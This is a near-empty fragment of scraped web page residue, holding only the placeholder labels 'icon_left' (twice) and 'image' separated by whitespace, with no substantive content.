     icon_left
    

    

     icon_left
    

   

   

   

   

    image